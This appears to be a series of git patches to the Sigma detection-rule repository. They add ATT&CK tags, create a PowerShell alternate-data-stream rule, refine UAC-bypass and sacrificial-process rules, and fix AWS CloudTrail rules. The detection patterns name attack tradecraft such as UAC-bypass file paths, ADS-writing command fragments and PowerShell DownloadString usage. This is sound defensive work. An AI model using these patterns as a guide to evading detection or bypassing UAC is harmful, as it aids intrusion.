0f6f6259..d146d9dc 100644 --- a/rules/windows/process_creation/win_susp_screenconnect_access.yml +++ b/rules/windows/process_creation/win_susp_screenconnect_access.yml @@ -21,3 +21,6 @@ detection: falsepositives: - Legitimate use by administrative staff level: high +tags: + - attack.initial_access + - attack.t1133 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_userinit_child.yml b/rules/windows/process_creation/win_susp_userinit_child.yml index 1b22804e..0c6693f1 100644 --- a/rules/windows/process_creation/win_susp_userinit_child.yml +++ b/rules/windows/process_creation/win_susp_userinit_child.yml @@ -24,3 +24,6 @@ fields: falsepositives: - Administrative scripts level: medium +tags: + - attack.defense_evasion + - attack.t1055 \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml b/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml index 0cd426a5..a7842bbe 100755 --- a/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml +++ b/rules/windows/registry_event/sysmon_suspicious_keyboard_layout_load.yml @@ -25,4 +25,6 @@ detection: falsepositives: - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" level: medium - +tags: + - attack.resource_development + - attack.t1588.002 From 5e87970c77ebf089b5ca96157bc6132694bda323 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 09:47:54 +0200 Subject: [PATCH 0694/1367] add powershell_store_file_in_alternate_data_stream.yml --- ...ll_store_file_in_alternate_data_stream.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml diff --git a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml new file mode 100644 index 00000000..cfe46b78 --- /dev/null +++ b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml @@ -0,0 +1,28 @@ +title: Powershell Store File In Alternate Data Stream +id: a699b30e-d010-46c8-bbd1-ee2e26765fe9 +status: experimental +author: frack113 +date: 2021/09/02 +description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md +tags: + - attack.defense-evasion + - attack.t1564.004 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_compspec: + ScriptBlockText|contains|all: + - 'Start-Process' + - '-FilePath "$env:comspec" ' + - '-ArgumentList ' + - '>' + condition: selection_id and selection_compspec +falsepositives: + - Unknown +level: medium \ No newline at end of file From 25c6f69ea3edd8d7251e6a69664c7cc37471fb1a Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 09:51:44 +0200 Subject: [PATCH 0695/1367] update references --- rules/windows/powershell/powershell_ntfs_ads_access.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_ntfs_ads_access.yml index 0d38b0d7..1c6f3018 100644 --- a/rules/windows/powershell/powershell_ntfs_ads_access.yml +++ b/rules/windows/powershell/powershell_ntfs_ads_access.yml @@ -4,6 +4,7 @@ status: experimental description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. references: - http://www.powertheshell.com/ntfsstreams/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md tags: - attack.defense_evasion - attack.t1564.004 From 6f1f70ca5e340b8884b0a020978a1bc79639acc1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 09:59:19 +0200 Subject: [PATCH 0696/1367] Add missing tags --- .../windows/process_creation/win_malware_conti_shadowcopy.yml | 3 +++ rules/windows/process_creation/win_malware_dtrack.yml | 3 +++ 2 files changed, 6 insertions(+) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 3292bcba..9c07e2c0 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -23,3 +23,6 @@ detection: falsepositives: - Some rare backup scenarios level: medium +tags: + - attack.impact + - attack.t1490 \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_dtrack.yml b/rules/windows/process_creation/win_malware_dtrack.yml index e5e429be..3d44a016 100644 --- a/rules/windows/process_creation/win_malware_dtrack.yml +++ b/rules/windows/process_creation/win_malware_dtrack.yml @@ -21,3 +21,6 @@ fields: falsepositives: - Unlikely level: critical +tags: + - attack.impact + - attack.t1490 \ No newline at end of file From 90e673e5ac8b9049be8253b679b3b9a50e6d6d62 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 10:17:50 +0200 Subject: [PATCH 0697/1367] fix invalid tags --- .../powershell_store_file_in_alternate_data_stream.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml index cfe46b78..070ace3c 100644 --- a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml +++ b/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml @@ -7,7 +7,7 @@ description: Storing files in Alternate Data Stream (ADS) similar to Astaroth ma references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md tags: - - attack.defense-evasion + - attack.defense_evasion - attack.t1564.004 logsource: product: windows From f4a5df67ae44492fce0da860f1d7ab4b434b6e8f Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 10:28:01 +0200 Subject: [PATCH 0698/1367] further narrowing down of the selection, therefore removing the filter --- .../win_bad_opsec_sacrificial_processes.yml | 28 ++++++++++++------- 1 file changed, 18 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 0b3481e0..2d85255b 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -24,24 +24,32 @@ logsource: category: process_creation product: windows detection: - selection: + selection1: Image|endswith: - '\WerFault.exe' - - '\rundll32.exe' - - '\regsvcs.exe' - - '\regasm.exe' - - '\regsvr32.exe' CommandLine|endswith: - '\WerFault.exe' + selection2: + Image|endswith: - '\rundll32.exe' + CommandLine|endswith: + - '\rundll32.exe' + selection3: + Image|endswith: - '\regsvcs.exe' + CommandLine|endswith: + - '\regsvcs.exe' + selection4: + Image|endswith: - '\regasm.exe' + CommandLine|endswith: + - '\regasm.exe' + selection5: + Image|endswith: - '\regsvr32.exe' - filter1: - ParentImage|contains: - - '\AppData\Local\' - - '\Microsoft\Edge\' - condition: selection and not filter1 + CommandLine|endswith: + - '\regsvr32.exe' + condition: 1 of selection* fields: - ParentImage - ParentCommandLine From 5cb6eed52e27f5b3f082055ced15172ff79b43a8 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 14:09:03 +0200 Subject: [PATCH 0699/1367] fix: remove single value lists --- .../win_bad_opsec_sacrificial_processes.yml | 30 +++++++------------ 1 file changed, 10 insertions(+), 20 deletions(-) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 2d85255b..f3f2deef 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -25,30 +25,20 @@ logsource: product: windows detection: selection1: - Image|endswith: - - '\WerFault.exe' - CommandLine|endswith: - - '\WerFault.exe' + Image|endswith: '\WerFault.exe' + CommandLine|endswith: '\WerFault.exe' selection2: - Image|endswith: - - '\rundll32.exe' - CommandLine|endswith: - - '\rundll32.exe' + Image|endswith: '\rundll32.exe' + CommandLine|endswith: '\rundll32.exe' selection3: - Image|endswith: - - '\regsvcs.exe' - CommandLine|endswith: - - '\regsvcs.exe' + Image|endswith: '\regsvcs.exe' + CommandLine|endswith: '\regsvcs.exe' selection4: - Image|endswith: - - '\regasm.exe' - CommandLine|endswith: - - '\regasm.exe' + Image|endswith: '\regasm.exe' + CommandLine|endswith: '\regasm.exe' selection5: - Image|endswith: - - '\regsvr32.exe' - CommandLine|endswith: - - '\regsvr32.exe' + Image|endswith: '\regsvr32.exe' + CommandLine|endswith: '\regsvr32.exe' condition: 1 of selection* fields: - ParentImage From aaa568ff2d8190c4b0b755d337b36382750fa420 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 2 Sep 2021 14:18:38 +0200 Subject: [PATCH 0700/1367] print covert by win_susp_print.yml --- .../process_creation_alternate_data_streams.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index 7460de70..1723a3de 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -28,10 +28,6 @@ detection: CommandLine|contains|all: - 'makecab ' - '.cab' - selection_tools_print: - CommandLine|contains|all: - - 'print ' - - '/D:' selection_tools_reg: CommandLine|contains|all: - 'reg ' From 6a1b95d947bebbe84f4a9685d2ad9c0c52b028cc Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 2 Sep 2021 14:22:59 +0200 Subject: [PATCH 0701/1367] Findstr covert by win_susp_findstr.yml --- .../process_creation_alternate_data_streams.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index 1723a3de..badd22c4 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -19,11 +19,6 @@ detection: CommandLine|contains|all: - 'type ' - ' > ' - selection_tools_findstr: - CommandLine|contains|all: - - 'findstr ' - - ' /V ' - - ' /L ' selection_tools_makecab: CommandLine|contains|all: - 'makecab ' From 0b373ff1e984254cb2c81fe1e78a45830418d6e9 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 14:47:47 +0200 Subject: [PATCH 0702/1367] fix: remove 2nd selection due to FPs --- .../process_creation/win_uac_bypass_dismhost.yml | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml index 6647013e..413109d9 100644 --- a/rules/windows/process_creation/win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml @@ -17,7 +17,7 @@ logsource: category: process_creation product: windows detection: - selection1: + selection: ParentImage|contains|all: - 'C:\Users\' - '\AppData\Local\Temp\' @@ -25,13 +25,4 @@ detection: IntegrityLevel: - 'High' - 'System' - selection2: - Image|contains|all: - - 'C:\Users\' - - '\AppData\Local\Temp\' - - '\DismHost.exe' - IntegrityLevel: - - 'High' - - 'System' - ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:' - condition: 1 of selection* + condition: selection From 15e25f963520b1ca7cfa141d793fb71073e6bbcc Mon Sep 17 00:00:00 2001 From: klingerko Date: Thu, 2 Sep 2021 14:50:14 +0200 Subject: [PATCH 0703/1367] update modifed date --- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index cd4c42d0..3a857bbc 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -6,7 +6,7 @@ references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 -modifed: 2021/08/26 +modifed: 2021/09/02 author: Florian Roth tags: - attack.defense_evasion From ab721c736cf5f098fbdc9a835df28dd6b85e36c4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 14:55:17 +0200 Subject: [PATCH 0704/1367] chore: move level/falsepositives to bottom --- .../file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml | 6 +++--- .../file_event/sysmon_uac_bypass_consent_comctl32.yml | 8 ++++---- .../file_event/sysmon_uac_bypass_dotnet_profiler.yml | 6 +++--- rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml | 6 +++--- .../windows/file_event/sysmon_uac_bypass_msconfig_gui.yml | 6 +++--- .../file_event/sysmon_uac_bypass_ntfs_reparse_point.yml | 6 +++--- rules/windows/file_event/sysmon_uac_bypass_winsat.yml | 6 +++--- rules/windows/file_event/sysmon_uac_bypass_wmp.yml | 6 +++--- .../process_creation/win_hktl_uacme_uac_bypass.yml | 6 +++--- .../windows/process_creation/win_uac_bypass_cleanmgr.yml | 6 +++--- .../process_creation/win_uac_bypass_consent_comctl32.yml | 6 +++--- .../windows/process_creation/win_uac_bypass_dismhost.yml | 6 +++--- .../windows/process_creation/win_uac_bypass_ieinstal.yml | 6 +++--- .../process_creation/win_uac_bypass_msconfig_gui.yml | 6 +++--- .../win_uac_bypass_ntfs_reparse_point.yml | 6 +++--- rules/windows/process_creation/win_uac_bypass_winsat.yml | 6 +++--- rules/windows/process_creation/win_uac_bypass_wmp.yml | 6 +++--- .../registry_event/sysmon_uac_bypass_shell_open.yml | 6 +++--- rules/windows/registry_event/sysmon_uac_bypass_winsat.yml | 6 +++--- rules/windows/registry_event/sysmon_uac_bypass_wmp.yml | 6 +++--- 20 files changed, 61 insertions(+), 61 deletions(-) diff --git a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml index fca1e671..b5cec569 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -23,3 +20,6 @@ detection: TargetFilename|contains: '\AppData\Local\Temp\' TargetFilename|endswith: '.dll' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml index da6b278e..fd9c808f 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -20,4 +17,7 @@ detection: selection: TargetFilename|startswith: 'C:\Windows\System32\consent.exe.@' TargetFilename|endswith: '\comctl32.dll' - condition: selection \ No newline at end of file + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml index 574a79b9..f2dd94cf 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -21,3 +18,6 @@ detection: TargetFilename|startswith: 'C:\Users\' TargetFilename|endswith: '\AppData\Local\Temp\pe386.dll' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml index 9ba625f0..826af0cb 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -23,3 +20,6 @@ detection: TargetFilename|contains: '\AppData\Local\Temp\' TargetFilename|endswith: 'consent.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml index cc0d08e6..d896bdb0 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -21,3 +18,6 @@ detection: TargetFilename|startswith: 'C:\Users\' TargetFilename|endswith: '\AppData\Local\Temp\pkgmgr.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml index 4c8b8198..7494bc23 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -21,3 +18,6 @@ detection: TargetFilename|startswith: 'C:\Users\' TargetFilename|endswith: '\AppData\Local\Temp\api-ms-win-core-kernel32-legacy-l1.DLL' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml index 74017b15..07a32c8c 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -23,3 +20,6 @@ detection: - '\AppData\Local\Temp\system32\winsat.exe' - '\AppData\Local\Temp\system32\winmm.dll' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml index efb7a09c..1026649f 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -24,3 +21,6 @@ detection: Image: 'C:\Windows\system32\DllHost.exe' TargetFilename: 'C:\Program Files\Windows Media Player\osk.exe' condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml index 09ac275e..a491142c 100644 --- a/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml +++ b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -22,3 +19,6 @@ detection: - Company: 'REvol Corp' - OriginalFileName: 'Akagi.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml index 3ed387b3..b2e34b5f 100644 --- a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml +++ b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: - 'High' - 'System' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml index e690075d..201451ab 100644 --- a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml +++ b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: - 'High' - 'System' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml index 413109d9..64e8fe82 100644 --- a/rules/windows/process_creation/win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -26,3 +23,6 @@ detection: - 'High' - 'System' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml index 7c734ccf..2db105f4 100644 --- a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml +++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -25,3 +22,6 @@ detection: Image|contains: '\AppData\Local\Temp\' Image|endswith: 'consent.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml index a7d65fd2..96e43028 100644 --- a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml +++ b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: ParentImage|endswith: '\AppData\Local\Temp\pkgmgr.exe' CommandLine: '"C:\Windows\system32\msconfig.exe" -5' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml index 4319cada..720da752 100644 --- a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -34,3 +31,6 @@ detection: - '\dismhost.exe {' Image|endswith: '\DismHost.exe' condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_winsat.yml b/rules/windows/process_creation/win_uac_bypass_winsat.yml index c9ec3b38..5350f745 100644 --- a/rules/windows/process_creation/win_uac_bypass_winsat.yml +++ b/rules/windows/process_creation/win_uac_bypass_winsat.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: ParentImage|endswith: '\AppData\Local\Temp\system32\winsat.exe' ParentCommandLine|contains: 'C:\Windows \system32\winsat.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_wmp.yml b/rules/windows/process_creation/win_uac_bypass_wmp.yml index 25ab25c7..df9bfe07 100644 --- a/rules/windows/process_creation/win_uac_bypass_wmp.yml +++ b/rules/windows/process_creation/win_uac_bypass_wmp.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -29,3 +26,6 @@ detection: - 'High' - 'System' condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 38c9c889..68481a95 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: registry_event product: windows @@ -21,3 +18,6 @@ detection: TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' Details|contains: '\Software\Classes\{' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml index 5d375369..43efa10c 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: registry_event product: windows @@ -23,3 +20,6 @@ detection: Details|startswith: 'c:\users\' Details|endswith: '\appdata\local\temp\system32\winsat.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml index ce2652e0..22f04a70 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: registry_event product: windows @@ -21,3 +18,6 @@ detection: TargetObject|endswith: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe' Details: 'Binary Data' condition: selection +falsepositives: + - Unknown +level: high From 9bcefc6a937bb700e30cb410643436ce67ca751b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 16:05:05 +0200 Subject: [PATCH 0705/1367] move uuid from global --- rules/windows/powershell/powershell_suspicious_download.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 1548d8cb..4870c05b 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -1,6 +1,5 @@ action: global title: Suspicious PowerShell Download -id: 65531a81-a694-4e31-ae04-f8ba5bc33759 status: experimental description: Detects suspicious PowerShell download command tags: @@ -14,6 +13,7 @@ falsepositives: - PowerShell scripts that download content from the Internet level: medium --- +id: 65531a81-a694-4e31-ae04-f8ba5bc33759 logsource: product: windows service: powershell @@ -25,6 +25,7 @@ detection: - '.DownloadString(' condition: webclient and download --- +id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d logsource: product: windows service: powershell-classic From 7ccb773b20ee2494e62279f3484c7b08f5a1f889 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 2 Sep 2021 17:37:41 +0100 Subject: [PATCH 0706/1367] Update AWS Update Login Profile rule Update selection criteria for AWS Update Login Profile rule to check for mismatch between userIdentity.arn and requestParameters.userName. Closes SigmaHQ/sigma#1966. --- rules/cloud/aws/aws_update_login_profile.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml index 8ac3ea17..6815fe2f 100644 --- a/rules/cloud/aws/aws_update_login_profile.yml +++ b/rules/cloud/aws/aws_update_login_profile.yml @@ -15,7 +15,7 @@ detection: eventSource: iam.amazonaws.com eventName: UpdateLoginProfile filter: - userIdentity.arn|contains: responseElements.accessKey.userName + userIdentity.arn|contains: requestParameters.userName condition: selection_source and not filter fields: - userIdentity.arn From 78d3fa4795373ccf8613fb75f4650d46eeb8f014 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 2 Sep 2021 17:32:33 +0100 Subject: [PATCH 0707/1367] Update AWS STS AssumeRole Misuse rule Update selection criteria for AWS STS AssumeRole Misuse rule for any event by an AssumedRole userIdentity. Closes SigmaHQ/sigma#1963. --- rules/cloud/aws/aws_sts_assumerole_misuse.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_sts_assumerole_misuse.yml b/rules/cloud/aws/aws_sts_assumerole_misuse.yml index f7464612..6163a040 100644 --- a/rules/cloud/aws/aws_sts_assumerole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumerole_misuse.yml @@ -12,8 +12,7 @@ logsource: service: cloudtrail detection: selection: - eventSource: sts.amazonaws.com - 